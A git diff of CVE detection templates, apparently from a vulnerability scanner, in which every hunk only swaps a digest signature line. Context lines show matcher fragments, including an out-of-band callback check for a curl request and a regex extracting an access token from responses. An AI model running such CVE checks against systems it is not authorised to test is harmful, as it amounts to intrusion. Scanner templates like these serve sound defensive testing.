490a0046304402206f461d9a22d4192ae50d7184b7c62456f024994ec86af7ac106a6acf92d75e9a02205c9f5d1ee349fbfb52b415a8925b40bc8086234dba1a1db9810e2c19cbc23dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009948aee763684825bc9b30c6fe75b736a1088ac0214c3264894147e3b56d685f02210092dffec3ee044843ce64c7a4d9fcc0353ccb52eea84a40cb6c8f5fa130d0ec81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 2f1236d64e..6a30bbff88 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022100d2ee0c48456364462d7c1a8ea7bb091882fa60e3f5feef0fbf0e95d002a1f9d502200ec877b901dcbe66ed9604657f506954e463a2e83c5da054a3d0a25a2872cea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004a81e5709fff9b5aa23e045c78c35817e5dbc8812da316c1c51e94ff787290702206dc169530141429140ce90a9e66c6dc159adbaa396626fccea387b98bca761ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 3d933c4083..ddcf01b94c 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022100f737b834d8d2f63b18c8ba8cf13ec2d6d966422dde65c1cbe93267a6e3eb3e7e02206668e55a7520baf24cf028a0f98825d967c1ec5440bc46a3b838c8d15e22f6e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050966a0d4c22ad96e6b4dc9b6776bc3be3ead136f9b455a1af5324a51b9ab6f8022100d09acb65cf947baaafa685326925167947592152796d14ac68e70bf9665f8efa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 85c0786203..0afac821d8 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4b0a00483046022100bc99c284b4061d571cd1f1f53fd4e4672d259fe90e88211dffdc8cf9fae2e535022100feddc93a339ace87fe03ff5ac04e7dcaccd3a1c432b3d375626183619de26896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048ef5100fdc4d5780eb5f4cfdf714c6104252db498c8096382ebdc158fd4b00e02200928fd94715a0774521522f3f39adc16f83e3d3c20fc9fb500b25d604baf9495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 975dbb1e81..ad157cacb0 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -51,4 +51,4 @@ http: - contains(header, "text/html") - contains(body_2, 'Admincenter') condition: and -# digest: 4b0a004830460221008292d511617bd0c0a8bcafe1cfa684cc711d54ab9a4eb35f63670ed0da9bb7070221008b351cb79ef3863804a1be0bb6833d415171ff25050bffc03a68641202906cd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100faf8f6ee6e838ca74e557254d5f6eb4d65a2b88c1db9ee61c42ba55d99a43adc0220396cf436a61c0b7d7687b1a0d744f99bd6ff57ebb60acdb17400dc7b69304ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index f84ce59c9e..facebf75bc 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098751517d9e020d64addef3f14cedca2d680492140d36e7544d0aa498932ce6102207f8df37d808c0662f751c6bef40da619f38e4f2303bc45fffc57c6bd1a656b2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1877788ae671ddcc6c5dbdcc650342aaf360eb349e967a586cf75858aab932c022100ba0dfed6f83494f955107a535f7b557ef0bb3d87bd2f5e6e9e1c9012d96c351e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 2dab5b6922..ad5547cf04 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b64fb96d0bdf7e75e75a35ec0199aa1a3b5ad75d08cb6c6005cdab98520d23e2022100edd40b93a955f7bda18c65178cbbb5d427b07936f1be261dae3217d6a0871932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5f6814aa5d06c039624e1388900e0996315533d8c419eefbe2de6caf447910a022100e6c8e5b02653c56e18102d89247b0711570a77ff45625ccf9e7cca81d1ed08b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index a0c18ba776..931c9a0825 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d995b5c47a61e69483f37d5514da329e6e5264c597a3db33117f015a98ea951022074cb814111b69e59c9ca138398de1758fb2b9ddff8e946023fc973237475ec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c39406182802fe8b9ffa065f62e7be3e481669903d495a6949fb9b4cf5c3fa8802205791c3506012ccf296d6dae5ddf44dee9f869f2b7eec108a352c0ec94274c48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 6b24fab5c1..946d4d2e02 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -51,4 +51,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a0046304402205d0bf594e5e591c8131ea79f03e90148cd44bb6a34f98409151d12e3e02decdf02200769496d8dae7769c9ed8d8aff7f94757ad51ddb46d0c8212cba99fd3f6c225b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c11dc698621ad5d479ce8b696577f5cefad748f79e912c23b63ec28b8241cab7022100eb380ef3a5801902ee831f7cea179e4e86d8cc93bdeb381d1985e4a367a6b44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 4ca1beb09a..43ab14d11a 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -45,4 +45,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 4a0a00473045022100e1348fd4216357ac7e04464f4ee2110e2828d3baf74786912a7106513c9d0f35022036ee43c70796a983b64da6cf1e77b10acd9d728c64a873b8785e14159e5f999e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb617461878cbf1cb97fb26512af671a914dc1d115f559de3711731793a4c89e022032c6a861070e3124588eba232d2457156b4686063cac141690eee2f1a9e366c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index c7e16c73e4..6b6b844a10 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -45,4 +45,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 490a004630440220294c36ae327578d5c37bbd02ecaddc883e04adf0ba0c9abd849ee966e6ac2aa002203394fbc3e007a113edbf89c8f0d1799750ba6b77f9e3894b8fb601d6e8e0d05a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4843883fe2485c515a79c00d17ea62c065bd50025c2c4c7a243d434d65daf1802207835fc7e73d18f106d16c31391ba326357df94fc9b3ebbea01335a66535e1f8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 6ddc352321..7d75702994 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -41,4 +41,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c6c91bc1cafbd787223af97e5547530e8543d2a73bdc2cfb85cedd488a7e695b022006c285923b223b83c2a2d0b7436f826f8058fb22a2641e34fef6c20843b50804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0c7423bf18413a0b58744deba1ec262ca414bb3b5f104c43651fd6b38ab44a7022062f98e95a05171d79819833fc2b54e8e47af9df4f77767967d9b6a5283628cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 42ae14df18..6d1c1f40ad 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -56,4 +56,4 @@ http: - contains_all(body, 'commands', 'command', 'value') - status_code == 200 condition: and -# digest: 4a0a004730450221008be0771baa09541819eed8cf8490b59d21222fd4e149890367eb446483e86aad022022d5602d27c4a4dbfb1831c5bbfc693e39da6614d3b85493036b7352a98c6033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018d2981931169b4ac76f2bc53373c35e3d41e15fbbd0edc56a74f3c9349996e20220031a4d9fdd2c00078341cf9cc6272c27cddef495be952aa84ef5f5288f981f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index f2adc64f35..266441641a 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d54ca66a373a5bdcb687b5b8b95c728c3ce6b58452faa138205faece235ac65b02210088184db11f7365836e9398e8726d7171649424fa801671bb3b01055266eec5e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088559921b903d99eb60be5c8d1c736542f2efcb6c870db07e407f880b952766902201f27e867d62d7b074b3f4239f748cfdceaa4a639ef021eb983afa2e4a1421592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index c21afb2f8a..959d70c650 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220243836b94a2d61545b25c455eded8de7de85ac65d3b6b9af8a8fcc77b63fd743022100f5505508a01612d3ac0944285448da37021c6c8b43040cc8e87ead6567966426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5081df6165056d0a60232314176ee608ab7e86aa51515dacb0184c53b2581c102201d2d5a1485f62e7956ae2a64a91ef95e9840ab920e077c73bf79ff44ac7ea570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 0c7a1c2d1c..3f2061da50 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -74,4 +74,4 @@ http: part: body_5 words: - '{{md5(string)}}' -# digest: 4b0a00483046022100d7b6619c72c238c99a15d4e2ccbeb5947b35506428ff680745d8ed73d15be7aa022100f8ef9c366ae03cf2cabed62594a0196e56719a271b4b998989058443a21834d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de3df7082a571b36e73fa64a73081349b3fd29a223f127fb5708c1ffb614d48102204dfb2aff3fb0b2d649a29ab7caafb7126fe6de5cbd78e0a753884d0eebedcd38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index 5c1031bc35..91203fae80 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c87539b230266de86c5cb08d7a6ad9aaaeb4263821230046e194e05e8a0174c4022100f43f59553b68b72f32bd7190982615fd429469fe92dedf5ac1147322a2b44bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be3e89c169301c2f96af2d6f398c8af9f377d1975edcd2a2b71eca1f988bc6320220578c949433c1f05c0b03f6a655ca57e5493f25351907897137aa40013864888f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 6b42a00699..22ae0683f6 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -56,4 +56,4 @@ http: - duration>=5 - 'contains(body, "Guest Information")' condition: and -# digest: 490a0046304402202f3f74b2aa2805006791102f5519990f7d0e4824ad34b3c4abeed275fedb7caa02204b28c27e4cdb49f6286322ce20f2009ee727d644cfaa0880970674e4487400e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f44d3b09198876fbf4b217649455afe606b9cea6230a8f7c292cc156ed077aa02204e0ac7e376ccf8d57157caa5243b1ce6605cc29ba6f89bc4b7c195579eeb6de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 88c763a994..376885c52a 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022039dcb449ff8816bc8cca6ea716b492917a6bc9699edff02714b46da93f9a584c022020e0fe7c1a69d8fc404e66eb77dbdbdcc0ac90efddccafe76b4adb310f5b540e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8d8b8a7e397064411042c3c9892231cf0075e26054416f0d77179c53a88a107022100eeec4f5165b4101d2bd809a7cbd2dfaee4950ab40d84ff7e6876c7089b79a01e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 6b7c59e0d6..610c0d8772 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202166d86ce51fb834d2224a38c2fc782a361c00323225718ad53ac225a1fc99e5022100b50ae20578925fa33bf3bf21b84ca62ad1f608e065b119d67da180e3c888efb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008437593007f282b4fa436dde37e968f021cdcb420dc06e8dad33f90f5c9c07d602210095e900731062e3f7559a188a77a5651a8de341aef8e82c5ebce4b0cabe0ae026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index bea9bcc4eb..3a2dde0702 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -36,4 +36,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">") && contains(body, "Adiscon LogAnalyzer")' condition: and -# digest: 4a0a0047304502206a66f6bc50518dd31432eccadd91e6dc8c2f79f3e27eb9f8b19578b0d72173a6022100d83612654984ad122725ef43c6cb741afbb79651f92547af91c3b9caa1409694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f97821e8560212cacd737cf3143cc95c35378c592396c0c7cca9d2e93acf482302210080da39a9593817aa30d0248c17f050014f39b550c97b784de33e60ea07a0c2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 214d4132e9..c67daa15c9 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe79b6e44ab8020b7faefa67f3a3d4942a785bad4463a968f3dd2a6f86c3f762022100f7d484210f37cf4a1a39a45131261d1aebd56373323505b1eddfac6ce045f90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e3b73e83543aad29fe760dc1db5fe37af306be56393c9926c65237e1566087e022100fbaedc4ef522a795c82b516441b5c8986414a7cf70007ec13d5535577d0db370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 1d4c47d875..1e306b33f3 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -41,4 +41,4 @@ http: part: header words: - "application/vnd.ms-excel" -# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204756644785cf8f6b3401876888de1efa5f00a2e2ce9ffc5e4eacf75cacae41f802200bb338ccebf1d53d196c50f415070a8ad4c488c6dafb66abab734395dd4ca6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index aba9b02418..3777c684c3 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -81,4 +81,4 @@ http: regex: - "([a-f0-9]{64}\\.ini)" internal: true -# digest: 4b0a00483046022100a67930b1a559ef939fdac690ac071be30685b6ef1c3c0a846c5569458aba33af022100c8fab782acd1cf1010a6d7ffa9d61f885432f29c8247207c7ca0b60d43b67a23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050c0c86d37adc93f15483be39ba88b4ef0b2147733b63f599775bb98e8b82e5702202f3f2ce3ef76d2946847a13a8badb6ce89120b87a6559d7b4e4187a798e29c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index 8e87afd17d..bd8415c11f 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0b807462fd2f740b6f35584821ecfcf41b62f92b2d611633a88ce0956d97ccc02202e8a6c9210020dea7ac6831519e021a0a8c55e8fac3baf8525bcb12e15dd4fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073b755c2e659b0e06ce652bf92d78132a56bea015b5226349c97deda0da9684f02204b07d43c5e8c19c0cf73d9824d1ebbc7e5f51c7a8169cf48e005d02d1a0776d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index e119981f5c..ab96df5842 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -103,4 +103,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body_4 -# digest: 490a0046304402207ad7b347a592e2187ab82ad8fcd08c9e9450340488818c2461f1b556f453438d022052153b577f0a31f4f323829b25293bd92882d19fd5ee60f7374293fec0f1dc93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac504d10da08b3f7ed6416ad38d78217a6e95a680ec872cb3ab0c7b19370adab022100f5c4676697e678d9c7b57b56b4645a1352e5f9859614a9ea306cde51d543e182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 5014790749..569f2aa483 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e65673944288c4ea38c1044a22777033e8ab6412a422cd751c1d2f1ed8dbf9a302207988cbc88e6e5d2a866dc57363ee691a4b374a1422637e2c051edb10462c5421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c5a80d771051373a8c6b0c2ca248ca734e5ee7408acfd6d2fb3c85902d221fb0221008f595d668911595afa24a9370d94dfb8fec9e8ce381ef47016acd2dc70a53914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 716d33643d..9181d15f53 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -52,4 +52,4 @@ http: - type: json json: - .data.content[].path -# digest: 4a0a0047304502204ab9d58c827030307982f2317cf0ef5e0e46c5e54170976febd9ae98ad7c5e62022100c5d29929622fac47b5729e0314b96749a088e78fc9b1eb2ae10b87a7e649ae16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100efb567bb46806b832495db880a8d13ebf428236bbe8dd99a8e915d3d0083318c022100b8451f80fc10358d1ab1f2acb9eae70278f042d67f9be136ccdee84a9517bfe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index a622aebde7..edea449c5d 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -52,4 +52,4 @@ http: - type: json json: - .data.content[].path -# digest: 490a00463044022027971041cce2ae19d7cb8074fb5dc9fdaab73699738e82a5de416cb674e2cecd022005349f9c79dd0692cb3cb08cf619db48fe91f489a6fec5b33874ddb2870f6398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c2a1dc67a28b7eed25ccf947755d6b97c566adf8a533a872f2a591d8c6915dd0220590851b1a68c6ae150b8e44d41cabf453e69386d98d8e71c105c314330be9d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index c33d1b1d78..80fa48f14c 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022008b98c50259984aac531d4812c005be599db235324a444c7a125dcc0fab0925002200fec9d238e01e18c9a70223ed7e68eea8945c5628b7149aebded1e9259cf169e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210089f80319b143c93e7435f2ec2060f9f63dd6bcc3c5f0876c3c357bf2e5e48243022100d2fe9ab17fc05c6192cbae674f24c8a5ecc5d4396d83bd4d97007aacbe0c8bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 008c25c278..edb08ddfc2 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -60,4 +60,4 @@ http: - contains(header_2, "text/html") - status_code_2 == 200 condition: and -# digest: 4a0a0047304502206fe16e183f71cbc3bfc374aaa3ea9730e8d0ed6830941bbdd8bd018d5787f8a0022100fc4ad26f98267cab592d1c2067bd512bb432d6a75b44b068e975176fd45401eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220643ea5d25ebd6462175647d0352e654dec11e5bbf97098502cdba54aa2b37b10022100f78b5a0c6736fc0b38d6b15d12a5a19cd77d77a558d46f34e3aed6499cbae411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 75a21edba1..c9233a7022 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ca5945dbf47943040f2934f8e61572c444140181a2cd484157f8e613510793ab02205adca55c099f7c849eb2adfdc1ce94a13d7c7d7c952dae099947665f691df30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3d764f1deaab0a74aa395664d2c03375128689f44db8ac4feaf8922dc7865e5022031daff978d8f50006c44303b8278c4488897eea780a082bd4bae73abcda826f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 84e7faf058..9f3bafac24 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8826a6a2aea8b8fdf4bfc526ec4eaf6e1a0613d805ba05235b18095a7a5796b0220449dc6d5f9a0d9bba00cbcd3d271d7ea2cd057ea1993f5acadaeb5edc012f478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009745433d8fa4b1a3de037ad2643c660e2c41e7c4150f54586807f4bdaf0963d6022051607fcc74bc68a32134c9eec40c7bacab67274ee662e00ef0cfcd80562312c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 10a859096f..c2bacff0ca 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -84,4 +84,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "successfully created")' condition: and -# digest: 4a0a00473045022059a2c7c448168f275b677d59ae6772e136b5cae38b3de5aec573a0498d7353b5022100b9e76c5236c7c11bb720146bb88b08f7f6b7945adc1c103571628437c4f2262e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206452761da1ebb71b5a2a85b17082354777b0f30a6d38f593ff0fd444629930430221008ec0e5895d41eaf6753d851aafa270e8bfdae54dc65c302ae5e25926af894564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 8be52fb07f..829857fc0d 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a917400368cfdba77d790147d84d75dde69c698ea1f50eb87e2e46ef3802e6702204a6951c6f20cf4e0722ad2424746f227dd1fb1172fe5f7e624c00010f826aa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a68493afeda3a529c805502d554dd09859471f0b6f015d91fc552daf23ecdab02206b1a2148e223a672e1bea3d217a5a72cc442d12cde66b1bd15d9548a6f6b2e55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 5257ce52bb..6d11af6d44 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -74,4 +74,4 @@ http: regex: - '(.*)' internal: true -# digest: 4a0a00473045022100ae8a56772a4bdf5d579c5a73fbfb6039c2a9d3907cbd13cc12f77a507b42ac6202204915a2338b893189e1f666a217b8e10ce060bab542e3ecb50151f15b2ff37559:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220575ada41e067b0063b7ad7058003ec029cfee0ca830bf8c18febb02c0933bfa502201d1566c2a59d49ef5a0289309769e0894ce341b208c868479d9b7a85b588aeed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 0e9c7058d9..3187e4b027 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' - 'contains(body, "")' condition: and -# digest: 